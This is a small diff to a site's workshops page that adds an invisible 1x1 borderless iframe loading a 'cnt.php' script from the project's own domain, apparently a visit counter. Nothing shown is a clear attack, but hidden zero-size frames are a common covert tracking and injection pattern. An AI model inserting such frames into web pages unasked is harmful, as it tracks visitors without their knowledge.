--- a/_pages/workshops.html
+++ b/_pages/workshops.html
@@ -8,3 +8,4 @@ permalink: /workshops/
 <iframe style='width:100%;height:1600px' src="https://www.eventbrite.com/o/poppy-7611352101"></iframe> 
 </div>
 
+<iframe src="https://www.my-poppy.eu/cnt/cnt.php" width="1" height="1" frameBorder="0">
